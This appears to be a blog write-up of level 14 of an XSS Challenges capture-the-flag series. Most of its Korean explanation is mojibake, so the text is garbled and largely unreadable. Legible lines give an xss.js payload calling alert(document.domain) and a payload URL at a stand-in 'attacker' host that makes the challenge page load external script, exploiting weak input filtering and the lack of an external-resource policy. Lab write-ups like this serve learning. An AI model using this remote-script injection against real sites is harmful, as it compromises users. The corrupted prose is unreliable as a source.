ν°μ€ν 리 λ·°
14λ¨κ³λΆν°λ μ‘°κΈμ© λμ΄λκ° μ¬λΌκ°λ κ²μΌλ‘ 보μ λλ€. λ©μΈ νμ΄μ§μλ λ€μ μ¬νν λμμΈμ κ°μ§κ³ μκΈ°μ μμ€λ₯Ό 보면μ λΆμμ ν΄λ³΄λλ‘ νκ² μ΅λλ€.
보μ΄λ ν¬μΈνΈκ° λ± 2κ³³μ΄ νμΈλ©λλ€. 첫λ²μ§Έλ analytics.js.js λΆλΆκ³Ό try_harder λ³μμ λλ€.
μ€ν¬λ‘€ μ μΌ νλ¨μΌλ‘ λ΄λ €λ³΄λ©΄ analytics.js νμΌμ΄ νλ λ μ‘΄μ¬ν©λλ€.
3λ²μ§Έ μ€μ analytics.js.jsλ μ ν¨νμ§ μμ κ²½λ‘μ΄λ©° μ€ν¬λ‘€ μ μΌ νλ¨μλ μ ν¨ν κ²½λ‘κ° μ λ ₯λμ΄ μμ΅λλ€.
μ λ ₯νκ³ μ νλ νλΌλ―Έν°μ κ°μ λͺ¨λ μ κ±°ν΄λ³΄λ©΄ srcμ λΆμ¬λ κ²½λ‘λ μ κ±°λμ΄ μμ§λ§. jsλ κ³ μ μ μΌλ‘ λ¨μ μμ΅λλ€.
μ λ ₯ κ° κ²μ¦μ μ΄λ»κ² μ§νλλ νμΈν΄λ³΄λ©΄ κ΅μ₯ν νμ΄νΈνκ² κ²μ¦νκ³ μμ΄ μμ μλ°μ€ν¬λ¦½νΈ ꡬ문μ μ½μ νμ¬ μ€νμν¬ μ μμ΅λλ€.
<xss.js>
window.addEventListener("load", function() { alert(document.domain);});
<Payload>
http://attacker/xss(.jsλ κ³ μ λμ΄μμ)
.js νμ₯μκ° κ³ μ λμ΄ μκ³ μ€ν¬λ¦½νΈκ° μ½μ λ μΈλΆ νμΌμ include μμΌμΌκ² λ€ λΌλ μκ°μ νκ³ μμλ€λ©΄ μ¬μ€μ μ΄λ €μ΄λ¬Έμ μ μνμ§ μλκ² κ°λ€μ.
μ΄ λ¬Έμ μ ν΅μ¬μ μ λ ₯ κ° κ²μ¦μ μμ νκ² νν°λ§λ§ νκ³ μΈλΆ 리μμ€μ icludeμ λν μ μ± μ μ‘΄μ¬νμ§ μμ μμ μ€ν¬λ¦½νΈ ꡬ문μ μ½μ νμ¬ μ¬μ©μλ₯Ό μΉ¨ν΄ν μ μλ€ λ‘ λ³΄μλ©΄ λκ² μ΅λλ€.
'CHALLENGE' μΉ΄ν κ³ λ¦¬μ λ€λ₯Έ κΈ
| XSS Challenges 13 (0) | 2021.08.29 |
|---|---|
| XSS Challenges 12 (0) | 2021.08.28 |
| XSS Challenges 11 (0) | 2021.08.27 |
| XSS Challenges 10 (0) | 2021.08.26 |
| XSS Challenges 9 (0) | 2021.08.25 |